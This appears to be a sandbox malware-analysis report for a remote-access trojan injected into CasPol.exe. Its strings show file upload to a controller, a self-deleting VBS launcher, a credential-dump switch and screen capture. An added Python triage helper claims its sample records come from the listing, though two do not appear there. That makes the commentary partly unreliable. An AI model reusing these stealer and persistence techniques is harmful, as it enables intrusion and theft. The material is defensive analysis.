                                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                              • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                              • GetLastError.KERNEL32 ref: 0041B313
                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                              • GetLastError.KERNEL32 ref: 0041B370
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                              • String ID: ?
                                                                                                              • API String ID: 3941738427-1684325040
                                                                                                              • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                              • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
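Read as a whole, the function records in this part of the report each name one capability: resolving NtAllocateVirtualMemory, NtFreeVirtualMemory, RtlAcquirePebLock and LdrEnumerateLoadedModules from ntdll by hand (GetModuleHandleW plus GetProcAddress), copying the executable into a new directory and marking it READONLY|HIDDEN|SYSTEM (SetFileAttributesW with 0x7) before relaunching it, enumerating volumes and their drive letters (FindFirstVolumeW, QueryDosDeviceW, GetVolumePathNamesForVolumeNameW), and playing or writing audio. The Python below is an added triage helper, not part of the report or the sample: it parses records in the layout used on this page (an "APIs" block followed by its "API ID" and "String ID" summary) and tags each one with the capability its API set and strings imply. The embedded input is a three-record excerpt constructed from the listing above; the rule names and the "/stext" rule (the switch NirSoft's password-recovery utilities take to save results as text) are this example's own choices.

```python
import re

# Constructed excerpt in the layout used by this report. The three records are
# copied from the listing above; a real run would feed in the whole page.
SAMPLE_REPORT = r"""APIs
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
APIs
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
"""

# "• Name.MODULE(" or "• Name.MODULE ref:", optionally prefixed by "Part of subcall function XXXX:".
API_CALL = re.compile(
    r"^\s*•\s+(?:Part of subcall function [0-9A-F]+:\s+)?([A-Za-z_0-9]+)\.[A-Z0-9_]+(?:\(| ref:)"
)

# Capability rules: (tag, predicate over the record's API-name set and string set).
RULES = [
    ("audio_capture_playback", lambda apis, strs:
        bool({"mciSendStringA", "mciSendStringW"} & apis) or {"RIFF", "WAVE"} <= strs),
    ("native_api_resolution", lambda apis, strs:
        "GetProcAddress" in apis and any(s.startswith(("Nt", "Rtl", "Ldr")) for s in strs)),
    ("volume_enumeration", lambda apis, strs:
        bool({"FindFirstVolumeW", "FindNextVolumeW"} & apis)),
    ("run_key_persistence", lambda apis, strs:
        any("CurrentVersion\\Run" in s for s in strs)),
    ("self_deleting_script", lambda apis, strs:
        "fso.DeleteFile(Wscript.ScriptFullName)" in strs),
    ("nirsoft_stext_dump", lambda apis, strs:
        any(s.startswith("/stext") for s in strs)),
]


def parse_records(text):
    """Split report text into per-function records of API names, API ID and String IDs."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"apis": set(), "api_id": "", "strings": set()}
            records.append(cur)
            continue
        if cur is None:
            continue
        if s.startswith("• API ID:"):
            cur["api_id"] = s.split(":", 1)[1].strip()
        elif s.startswith("• String ID:"):
            cur["strings"] = set(s.split(":", 1)[1].strip().split("$"))
        else:
            m = API_CALL.match(s)
            if m:
                cur["apis"].add(m.group(1))
    return records


def tag_records(records):
    """Attach every matching capability tag to each parsed record."""
    out = []
    for rec in records:
        tags = [name for name, pred in RULES if pred(rec["apis"], rec["strings"])]
        out.append({"api_id": rec["api_id"], "apis": sorted(rec["apis"]), "tags": tags})
    return out


if __name__ == "__main__":
    for rec in tag_records(parse_records(SAMPLE_REPORT)):
        print(rec["api_id"][:40].ljust(40), ", ".join(rec["tags"]) or "-")
```

The rules key on the String ID list as much as on API names, because a function that only calls GetProcAddress says nothing on its own; it is the ntdll export names beside it that mark the record as manual native-API resolution of the kind injection code relies on.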
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9), ref: 004176CC
                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF), ref: 004176D5
                                                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                              • API String ID: 1223786279-3931108886
                                                                                                              • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                              • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                              • API String ID: 2490988753-744132762
                                                                                                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$EnvironmentVariable
                                                                                                              • String ID:
                                                                                                              • API String ID: 1464849758-0
                                                                                                              • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                              • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 0041B88A
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEnumOpen
                                                                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                              • API String ID: 1332880857-3714951968
                                                                                                              • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                                                                              • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                              • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                                                                              • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                              APIs
                                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                              • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                              • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                              • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                              • String ID: Close
                                                                                                              • API String ID: 1657328048-3535843008
                                                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$Info
                                                                                                              • String ID:
                                                                                                              • API String ID: 2509303402-0
                                                                                                              • Opcode ID: d1da9e7b30878a4a49500d5bdd2d15103fb4e7496709f5eeefc3f26d3dc5ccb1
                                                                                                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                              • Opcode Fuzzy Hash: d1da9e7b30878a4a49500d5bdd2d15103fb4e7496709f5eeefc3f26d3dc5ccb1
                                                                                                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00407F4C
                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040821A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                              • API String ID: 1884690901-3066803209
                                                                                                              • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                              • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00409DCD
                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000), ref: 00409E10
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00409F40
                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                              • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                                                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                              • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                                                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                              • _free.LIBCMT ref: 004500A6
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 004500C8
                                                                                                              • _free.LIBCMT ref: 004500DD
                                                                                                              • _free.LIBCMT ref: 004500E8
                                                                                                              • _free.LIBCMT ref: 0045010A
                                                                                                              • _free.LIBCMT ref: 0045011D
                                                                                                              • _free.LIBCMT ref: 0045012B
                                                                                                              • _free.LIBCMT ref: 00450136
                                                                                                              • _free.LIBCMT ref: 0045016E
                                                                                                              • _free.LIBCMT ref: 00450175
                                                                                                              • _free.LIBCMT ref: 00450192
                                                                                                              • _free.LIBCMT ref: 004501AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                              • API String ID: 489098229-65789007
                                                                                                              • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                                                                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                              • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                                                                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                              APIs
                                                                                                              • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                              • API String ID: 994465650-2151626615
                                                                                                              • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                              • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                              APIs
                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00412679
                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32 ref: 00412692
                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                              • API String ID: 1913171305-390638927
                                                                                                              • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                              • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                              • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                              • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                              APIs
                                                                                                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000), ref: 0045466D
                                                                                                              • GetLastError.KERNEL32 ref: 00454A96
                                                                                                              • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                              • GetFileType.KERNEL32 ref: 00454AA9
                                                                                                              • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                              • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                              • GetLastError.KERNEL32 ref: 00454C58
                                                                                                              • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                              • String ID: H
                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                              • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                              • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                              • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
